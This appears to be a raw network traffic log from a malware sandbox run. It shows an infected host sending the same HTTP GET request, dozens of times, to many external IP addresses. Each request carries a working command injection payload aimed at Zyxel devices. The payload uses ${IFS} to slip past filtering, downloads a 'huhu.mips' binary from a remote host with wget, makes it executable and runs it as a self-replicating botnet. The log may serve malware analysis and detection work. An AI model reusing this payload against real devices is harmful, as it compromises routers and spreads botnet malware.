                                      Jan 19, 2024 17:29:26.659709930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3022192.168.2.143385845.181.117.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659743071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3023192.168.2.144885286.217.246.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659775019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3024192.168.2.1450406160.255.84.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659826040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3025192.168.2.144829846.204.178.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659849882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3026192.168.2.1438200108.126.186.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659909964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3027192.168.2.1441624188.211.197.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659919024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3028192.168.2.144210842.21.4.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659971952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3029192.168.2.1433606200.80.1.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660036087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3030192.168.2.1448054173.150.7.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660053015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3031192.168.2.14342902.159.79.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660099030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3032192.168.2.146062650.202.198.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660125017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3033192.168.2.143601838.12.186.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660170078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3034192.168.2.146019643.194.179.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660197973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3035192.168.2.1435890204.216.28.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660235882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3036192.168.2.145602695.113.178.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660259962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3037192.168.2.1460264108.254.139.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660311937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3038192.168.2.1454780188.149.131.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660347939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3039192.168.2.1454342108.233.34.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660382032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3040192.168.2.145225825.83.130.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660415888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3041192.168.2.1460032191.34.234.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660459042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3042192.168.2.145420087.248.218.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660495996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3043192.168.2.1441844180.143.58.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660541058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3044192.168.2.145109282.118.197.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660563946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3045192.168.2.1449598164.210.35.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660613060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3046192.168.2.143594083.123.129.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660644054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3047192.168.2.1433894140.39.161.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660676003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3048192.168.2.1440744110.34.8.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660722971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3049192.168.2.1444820152.28.129.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660739899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3050192.168.2.1433094169.70.190.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660801888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3051192.168.2.143937295.202.108.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660851002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3052192.168.2.144798086.249.235.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660877943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3053192.168.2.143632257.3.40.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660918951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3054192.168.2.1438590220.229.209.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660933018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3055192.168.2.1452838110.11.218.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.660972118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3056192.168.2.144796461.72.0.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661071062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3057192.168.2.1448234206.59.23.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661108017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3058192.168.2.145696878.93.138.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661160946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3059192.168.2.145591284.150.174.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661218882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3060192.168.2.1435434109.169.67.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661238909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3061192.168.2.144593278.106.91.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661298037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3062192.168.2.1456528201.3.224.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661345959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3063192.168.2.1446426167.152.250.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661369085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3064192.168.2.143620893.206.208.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661422968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3065192.168.2.143463696.247.53.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661458969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3066192.168.2.143746239.183.24.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661510944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3067192.168.2.146010674.210.204.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661545038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3068192.168.2.1444066123.63.99.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661582947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3069192.168.2.1460844153.64.67.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661602974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3070192.168.2.1440858152.199.163.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661652088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3071192.168.2.144033494.59.21.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661670923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3072192.168.2.145933042.67.145.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661703110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3073192.168.2.1451428131.20.218.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661747932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3074192.168.2.145536238.105.164.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661762953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3075192.168.2.1449862165.140.20.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661803961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3076192.168.2.14564704.142.96.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661859035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3077192.168.2.1455022196.10.193.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661911964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3078192.168.2.1452432154.212.23.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661925077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3079192.168.2.144968092.200.229.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.661967993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3080192.168.2.143964095.26.101.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662009954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3081192.168.2.145310293.92.100.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662045956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3082192.168.2.1454998126.85.160.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662097931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3083192.168.2.145284077.197.36.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662136078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3084192.168.2.1451678208.254.54.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662175894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3085192.168.2.145252640.176.9.71443
                                      TimestampBytes transferredDirectionData
